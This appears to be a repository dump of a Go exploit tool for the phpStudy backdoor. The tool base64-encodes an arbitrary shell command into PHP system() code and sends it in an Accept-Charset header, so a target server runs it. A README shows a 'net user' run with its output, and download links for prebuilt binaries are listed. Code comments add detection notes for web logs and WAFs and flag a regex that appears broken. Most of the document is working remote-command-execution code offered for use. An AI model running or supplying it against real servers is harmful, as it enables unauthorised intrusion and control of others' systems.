├── README.md
├── phpstudy_backdoor-amd64
├── phpstudy_backdoor-amd64.exe
├── phpstudy_backdoor-darwin-amd64
├── phpstudy_backdoor-darwin-i386
├── phpstudy_backdoor-i386
├── phpstudy_backdoor-i386.exe
└── phpstudy_backdoor.go
/README.md:
--------------------------------------------------------------------------------
1 | # phpstudy_backdoor
2 |
3 |
4 | 仅供检测自己的 phpstudy 环境，请勿对其他网站使用。
5 |
6 | ` go run phpstudy_backdoor.go http://8.8.8.8/ "net user" `
7 |
8 |
9 | ```
10 | Active code page: 65001
11 |
12 | User accounts for \\WIN-25US8G3F849
13 |
14 | -------------------------------------------------------------------------------
15 | Administrator Guest
16 | The command completed successfully.
17 |
18 | ```
19 |
--------------------------------------------------------------------------------
/phpstudy_backdoor-amd64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-amd64
--------------------------------------------------------------------------------
/phpstudy_backdoor-amd64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-amd64.exe
--------------------------------------------------------------------------------
/phpstudy_backdoor-darwin-amd64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-darwin-amd64
--------------------------------------------------------------------------------
/phpstudy_backdoor-darwin-i386:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-darwin-i386
--------------------------------------------------------------------------------
/phpstudy_backdoor-i386:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-i386
--------------------------------------------------------------------------------
/phpstudy_backdoor-i386.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-i386.exe
--------------------------------------------------------------------------------
/phpstudy_backdoor.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | _"compress/gzip"
5 | "encoding/base64"
6 | "fmt"
7 | "io/ioutil"
8 | "net/http"
9 | "os"
10 | "regexp"
11 |
12 | )
13 |
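// main sends one GET request to the URL given in os.Args[1] and prints the
// text that the regular expression below captures from the response body.
//
// The command given in os.Args[2] is spliced, unescaped, into a PHP snippet
// (echo, system("chcp 65001 && <command>"), echo). The snippet is
// base64-encoded and sent as the value of the Accept-Charset request header.
//
// Detection notes: Accept-Charset normally carries charset names, so a value
// that base64-decodes to PHP source containing system( stands out in
// web-server, proxy or WAF logs. This client also always sends the same
// Chrome 77 User-Agent and "Accept-Encoding: gzip,deflate". Because of the
// chcp call, output produced by the snippet starts with the code-page banner
// seen in the README's sample output ("Active code page: 65001").
func main() {
	// Both positional arguments are required; indexing os.Args without this
	// check panics with an index-out-of-range error.
	if len(os.Args) < 3 {
		fmt.Fprintln(os.Stderr, "usage: phpstudy_backdoor <url> <command>")
		os.Exit(1)
	}
	target, command := os.Args[1], os.Args[2]

	snippet := "echo '\r\n\r\n';system(\"chcp 65001 && " + command + "\");echo '\r\n';"
	payload := base64.StdEncoding.EncodeToString([]byte(snippet))

	// A malformed URL makes NewRequest fail; the original discarded this
	// error and went on to use a nil request.
	req, err := http.NewRequest("GET", target, nil)
	if err != nil {
		fmt.Fprintln(os.Stderr, "building request:", err)
		os.Exit(1)
	}
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36")
	req.Header.Set("Connection", "keep-alive")
	req.Header.Set("Accept-Charset", payload)
	req.Header.Set("Accept-Encoding", "gzip,deflate")

	resp, err := (&http.Client{}).Do(req)
	if err != nil {
		// resp is nil when Do fails. The original printed "error" and then
		// dereferenced resp.Body, which crashed with a nil-pointer panic.
		fmt.Fprintln(os.Stderr, "error:", err)
		os.Exit(1)
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Fprintln(os.Stderr, "reading response:", err)
		return
	}

	// regexp.MustCompile panics on an invalid pattern and never returns nil,
	// so the original nil check was unreachable and has been dropped.
	// NOTE(review): the pattern is kept exactly as found. Its lazy group can
	// match the empty string, so the captures printed below may all be empty;
	// presumably delimiters around the group were lost. Confirm against the
	// upstream file.
	reg := regexp.MustCompile(`(?s:(.*?))`)
	for _, match := range reg.FindAllStringSubmatch(string(body), -1) {
		fmt.Println(match[1])
	}
}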
--------------------------------------------------------------------------------